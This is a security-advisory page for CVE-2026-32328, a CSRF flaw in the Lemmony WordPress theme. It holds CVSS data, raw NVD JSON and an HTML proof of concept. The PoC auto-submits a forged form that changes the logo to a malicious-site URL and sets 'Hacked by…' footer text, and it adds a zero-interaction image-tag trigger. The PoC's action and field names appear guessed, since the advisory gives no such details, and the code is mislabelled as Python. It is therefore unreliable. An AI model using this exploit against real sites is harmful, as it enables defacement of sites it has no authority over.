Security Vulnerability Report
中文
CVE-2026-32328 CVSS 5.4 MEDIUM

CVE-2026-32328

Published: 2026-03-13 19:54:43
Last Modified: 2026-04-22 21:30:26

Description

Cross-Site Request Forgery (CSRF) vulnerability in shufflehound Lemmony lemmony allows Cross Site Request Forgery.This issue affects Lemmony: from n/a through < 1.7.1.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Lemmony < 1.7.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2026-32328 Lemmony Theme --> <!-- This PoC demonstrates a CSRF attack that could modify Lemmony theme settings --> <!DOCTYPE html> <html> <head> <title>Lemmony CSRF PoC - CVE-2026-32328</title> </head> <body> <h2>Lemmony Theme CSRF Attack PoC</h2> <p>This PoC demonstrates the CSRF vulnerability in Lemmony WordPress theme.</p> <!-- Example: Modify theme settings --> <form action="http://target-site.com/wp-admin/admin-post.php" method="POST" id="csrfForm"> <input type="hidden" name="action" value="lemmony_settings_update"> <input type="hidden" name="lemmony_theme_options[site_logo]" value="https://malicious-site.com/backdoor.png"> <input type="hidden" name="lemmony_theme_options[footer_text]" value="Hacked by CVE-2026-32328"> <input type="hidden" name="_wpnonce" value=""> <!-- Missing CSRF token validation --> </form> <script> // Auto-submit form when page loads document.getElementById('csrfForm').submit(); console.log('CSRF request sent'); </script> <p>If you see this message, the form has been submitted.</p> </body> </html> <!-- Alternative: Image tag based trigger (no user interaction) --> <!-- <img src="http://target-site.com/wp-admin/admin-post.php?action=lemmony_settings_update&param=value" width="0" height="0"> -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32328", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:42.943", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in shufflehound Lemmony lemmony allows Cross Site Request Forgery.This issue affects Lemmony: from n/a through < 1.7.1."}, {"lang": "es", "value": "Vulnerabilidad de falsificación de petición en sitios cruzados (CSRF) en shufflehound Lemmony lemmony permite la falsificación de petición en sitios cruzados. Este problema afecta a Lemmony: desde n/d hasta &lt; 1.7.1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/lemmony/vulnerability/wordpress-lemmony-theme-1-7-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}